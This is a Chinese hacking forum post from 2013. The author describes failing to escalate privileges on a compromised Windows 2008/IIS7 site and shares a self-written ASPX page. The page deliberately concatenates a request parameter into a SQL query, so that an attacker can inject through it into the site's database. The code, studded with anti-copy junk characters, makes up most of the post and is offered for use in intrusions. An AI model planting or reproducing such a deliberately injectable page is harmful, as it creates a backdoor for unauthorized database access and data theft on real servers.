昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。; [9 D' ~0 k$ i" M; N8 M" Q
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。7 \ L' t' t8 v- K" m1 H( T
代码量不多,自己写个拉倒了。烦死了。2 t2 Y& m8 L6 r) h
5 H8 H6 o7 h8 E1 T! u6 j# B7 @" k$ V3 F& W4 m' q' F4 y: J
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
$ `# c, e( S% X0 o, i: l<html xmlns="http://www.w3.org/1999/xhtml">; k$ u' c! Y/ d. I, @3 m
<head runat="server">! u' ]+ A6 `( S G% \
<title>暗影aspx构造注射专用页面</title>! N. G5 C% d5 \
</head>* _8 g( w) x1 X v; J% q
<body>
0 x4 _* v* Q& g4 e6 H' K0 d <form id="form1" runat="server">) g+ e( A5 j# ^0 ^2 U6 G5 U
<div>$ x4 ^' O4 N9 E
<script language="c#" runat="server">& V; s* N; v6 K) g2 ^
5 d4 N& X3 t! G1 b$ y6 g void page_init(object sender, EventArgs e)6 u# t5 K" M# H N* e8 v9 @& E
{
. x! O7 ?# T: h5 x 1 ?/ p- s: ^: \. O
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
3 \/ p4 ] E3 |3 E0 r1 I9 W
5 V* _2 f7 E% g4 T conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();/ v4 K( v2 A0 y, w5 E
conn.Open();. @4 y: p$ n5 b0 B7 x `% {: E5 i
2 U, F7 D( K. V+ Q0 x. q* x" W
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=13 r7 W4 T) v) x7 y" }& U& v
) {6 C8 L7 ^5 R5 {- S' E6 ?: G System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);! ]( I' ^9 N; N$ Z+ M
int x = command.ExecuteNonQuery();8 J! F- D' Z# c# `2 U' Q# x
Response.Write(i+"\n");
6 M ^# h& c) N( ]. i+ q Response.Write(x);5 O2 r7 y* y& O$ b0 y1 A X; N
conn.Close();
3 l1 p. e9 v' v }
( f+ n0 p' f3 J3 p4 N. _# L8 d; M
+ n& y M' s& B% Z </script>
' i# L" J7 X2 i </div>' e5 ?3 n5 x. N6 x& P9 Y L
</form>0 A; {, v/ B$ C4 M7 ?$ x9 P
</body>
* J" }" U4 L8 Q</html>
; C, U9 s1 x" q3 b& E |
发表于 2013-3-20 21:32:01
收藏
支持
反对